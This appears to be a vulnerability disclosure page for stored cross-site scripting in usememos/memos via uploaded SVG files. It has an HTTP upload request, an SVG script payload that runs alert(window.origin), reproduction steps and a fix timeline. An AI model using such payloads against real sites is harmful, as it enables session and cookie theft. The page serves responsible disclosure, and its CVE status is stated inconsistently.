Cross-site scripting - Stored via upload `.svg` file in in usememos/memos


Reported on

Dec 20th 2022


When user upload a file with .svg extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing SVG as HTML file

Proof of Concept

POST /api/resource HTTP/2
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate

Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
  <circle cx="50" cy="50" r="45" fill="green"
  <script type="text/javascript">
    // <![CDATA[
   // ]]>

Step to reproduce

  1. Prepare a file xss.svg with content: <script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script>
  2. Upload xss.svg file in Resource library -> Upload
  3. Coppy Link file XSS send to victim


This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
Juy Lang modified the report
a year ago
Juy Lang modified the report
a year ago
We have contacted a member of the usememos/memos team and are waiting to hear back a year ago
STEVEN validated this vulnerability a year ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.0 with commit c07b4a a year ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability a year ago
Juy Lang
a year ago


I see the CVE has not been assigned. Please help me!!

to join this conversation